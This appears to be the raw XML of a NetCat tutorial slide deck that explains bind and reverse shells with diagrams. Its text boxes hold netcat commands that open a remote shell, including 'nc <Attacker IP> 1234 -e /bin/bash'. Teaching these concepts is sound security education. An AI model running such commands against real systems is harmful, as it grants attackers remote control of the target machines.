              <a:off x="10902960" y="493164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7" name="Graphic 113"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="921240" y="3417840"/>
            <a:ext cx="1932480" cy="2220120"/>
            <a:chOff x="921240" y="3417840"/>
            <a:chExt cx="1932480" cy="2220120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="298" name="Freeform: Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="921240" y="3417840"/>
              <a:ext cx="1932480" cy="2080800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1932480"/>
                <a:gd name="textAreaRight" fmla="*/ 1933200 w 1932480"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 2080800"/>
                <a:gd name="textAreaBottom" fmla="*/ 2081520 h 2080800"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1222920" y="4806360"/>
              <a:ext cx="1308960" cy="831600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1308960"/>
                <a:gd name="textAreaRight" fmla="*/ 1309680 w 1308960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 831600"/>
                <a:gd name="textAreaBottom" fmla="*/ 832320 h 831600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1274040" y="3417840"/>
              <a:ext cx="1217520" cy="812520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1217520"/>
                <a:gd name="textAreaRight" fmla="*/ 1218240 w 1217520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 812520"/>
                <a:gd name="textAreaBottom" fmla="*/ 813240 h 812520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1263240" y="5572440"/>
              <a:ext cx="1227960" cy="2340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23400"/>
                <a:gd name="textAreaBottom" fmla="*/ 24120 h 23400"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584360" y="4145760"/>
              <a:ext cx="606240" cy="33552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35520"/>
                <a:gd name="textAreaBottom" fmla="*/ 336240 h 335520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1668600" y="4055400"/>
              <a:ext cx="154440" cy="81720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 154440"/>
                <a:gd name="textAreaRight" fmla="*/ 155160 w 154440"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 81720"/>
                <a:gd name="textAreaBottom" fmla="*/ 82440 h 81720"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1951560" y="4057200"/>
              <a:ext cx="153000" cy="8100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81000"/>
                <a:gd name="textAreaBottom" fmla="*/ 81720 h 81000"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="305" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2576520" y="4442400"/>
            <a:ext cx="7080840" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="TextBox 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369960" y="3929040"/>
            <a:ext cx="7728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Attacker Connects to target on port 1234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07" name="TextBox 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8460000" y="5623200"/>
            <a:ext cx="348408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 nc –lvp 1234 –e /bin/bash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08" name="TextBox 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654120" y="5669640"/>
            <a:ext cx="330588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 nc –v &lt;Server IP&gt; 1234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09" name="TextBox 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10021680" y="3068280"/>
            <a:ext cx="94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Server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10" name="TextBox 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365480" y="2986560"/>
            <a:ext cx="1334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Attacker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231280" y="250920"/>
            <a:ext cx="7728840" cy="79632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90000"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0" strike="noStrike" cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>What is reverse shell ?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12" name="TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963440" y="1157400"/>
            <a:ext cx="84682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73239"/>
                </a:solidFill>
                <a:latin typeface="urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A reverse shell or connect-back is a setup, where the attacker must first start the server on his machine, while the target machine will have to act as a client that connects to the server served by the attacker. After the successful connection, the attacker can gain access to the shell of the target computer.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313" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9742320" y="3526200"/>
            <a:ext cx="1224000" cy="1932840"/>
            <a:chOff x="9742320" y="3526200"/>
            <a:chExt cx="1224000" cy="1932840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="314" name="Freeform: Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9742320" y="3541680"/>
              <a:ext cx="1224000" cy="1715760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1224000"/>
                <a:gd name="textAreaRight" fmla="*/ 1224720 w 1224000"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1715760"/>
                <a:gd name="textAreaBottom" fmla="*/ 1716480 h 1715760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9742320" y="3573000"/>
              <a:ext cx="1224000" cy="1715760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1224000"/>
                <a:gd name="textAreaRight" fmla="*/ 1224720 w 1224000"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1715760"/>
                <a:gd name="textAreaBottom" fmla="*/ 1716480 h 1715760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9875520" y="5290920"/>
              <a:ext cx="958320" cy="168120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 958320"/>
                <a:gd name="textAreaRight" fmla="*/ 959040 w 958320"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 168120"/>
                <a:gd name="textAreaBottom" fmla="*/ 168840 h 168120"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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rgbClr val="E2E7F4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Freeform: Shape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9906480" y="3526200"/>
              <a:ext cx="941400" cy="28080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 941400"/>
                <a:gd name="textAreaRight" fmla="*/ 942120 w 941400"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 28080"/>
                <a:gd name="textAreaBottom" fmla="*/ 28800 h 28080"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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rgbClr val="B1C0E0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Freeform: Shape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9948600" y="376200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Freeform: Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9851760" y="371196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Freeform: Shape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10756800" y="377100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Freeform: Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9948600" y="413604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Freeform: Shape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9851760" y="408636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Freeform: Shape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10756800" y="414540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Freeform: Shape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9963000" y="455508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Freeform: Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9865800" y="450540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Freeform: Shape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10770480" y="456444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Freeform: Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9963000" y="4956480"/>
              <a:ext cx="759600" cy="134280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 759600"/>
                <a:gd name="textAreaRight" fmla="*/ 760320 w 759600"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 134280"/>
                <a:gd name="textAreaBottom" fmla="*/ 135000 h 134280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9865800" y="4906800"/>
              <a:ext cx="32040" cy="23004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30040"/>
                <a:gd name="textAreaBottom" fmla="*/ 230760 h 230040"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10770480" y="4966200"/>
              <a:ext cx="118080" cy="11808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18080"/>
                <a:gd name="textAreaBottom" fmla="*/ 118800 h 118080"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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558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0" name="Graphic 113"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="575280" y="3429000"/>
            <a:ext cx="1932480" cy="2220120"/>
            <a:chOff x="575280" y="3429000"/>
            <a:chExt cx="1932480" cy="2220120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Freeform: Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="575280" y="3429000"/>
              <a:ext cx="1932480" cy="2080800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1932480"/>
                <a:gd name="textAreaRight" fmla="*/ 1933200 w 1932480"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 2080800"/>
                <a:gd name="textAreaBottom" fmla="*/ 2081520 h 2080800"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="877320" y="4817520"/>
              <a:ext cx="1308960" cy="831600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1308960"/>
                <a:gd name="textAreaRight" fmla="*/ 1309680 w 1308960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 831600"/>
                <a:gd name="textAreaBottom" fmla="*/ 832320 h 831600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928080" y="3429000"/>
              <a:ext cx="1217520" cy="812520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1217520"/>
                <a:gd name="textAreaRight" fmla="*/ 1218240 w 1217520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 812520"/>
                <a:gd name="textAreaBottom" fmla="*/ 813240 h 812520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="917640" y="5583600"/>
              <a:ext cx="1227960" cy="2340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23400"/>
                <a:gd name="textAreaBottom" fmla="*/ 24120 h 23400"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238760" y="4156920"/>
              <a:ext cx="606240" cy="33552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35520"/>
                <a:gd name="textAreaBottom" fmla="*/ 336240 h 335520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1323000" y="4066560"/>
              <a:ext cx="154440" cy="81720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 154440"/>
                <a:gd name="textAreaRight" fmla="*/ 155160 w 154440"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 81720"/>
                <a:gd name="textAreaBottom" fmla="*/ 82440 h 81720"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1605600" y="4068000"/>
              <a:ext cx="153000" cy="81000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 153000"/>
                <a:gd name="textAreaRight" fmla="*/ 153720 w 153000"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 81000"/>
                <a:gd name="textAreaBottom" fmla="*/ 81720 h 81000"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="338" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2665080" y="4565520"/>
            <a:ext cx="6555600" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="TextBox 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024360" y="3940200"/>
            <a:ext cx="7728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Server Connects to Attacker on port 1234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40" name="TextBox 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575280" y="5988960"/>
            <a:ext cx="176472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 nc –lvp 1234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41" name="TextBox 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380000" y="5629680"/>
            <a:ext cx="461016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00"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> nc &lt;Attacker IP&gt; 1234 –e /bin/bash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42" name="TextBox 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9898560" y="3090600"/>
            <a:ext cx="94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Server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43" name="TextBox 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823320" y="3076920"/>
            <a:ext cx="1139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Attacker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145</TotalTime>
  <Words>406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</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>urw-din</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wood Type</vt:lpstr>
      <vt:lpstr>Parcel</vt:lpstr>
      <vt:lpstr>Parcel</vt:lpstr>
      <vt:lpstr>Parcel</vt:lpstr>
      <vt:lpstr>NetCat</vt:lpstr>
      <vt:lpstr>What is NetCat ?</vt:lpstr>
      <vt:lpstr>Basic use of netcat </vt:lpstr>
      <vt:lpstr>How to use netcat for chatting  ?</vt:lpstr>
      <vt:lpstr>Sending and Receiving Data or file ?</vt:lpstr>
      <vt:lpstr>What is Bind shell ?</vt:lpstr>
      <vt:lpstr>What is reverse shell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NetCat ?</dc:title>
  <dc:subject/>
  <dc:creator>Mani~Kumar</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>GeekInstitute</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-18T05:09:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-24T07:22:16Z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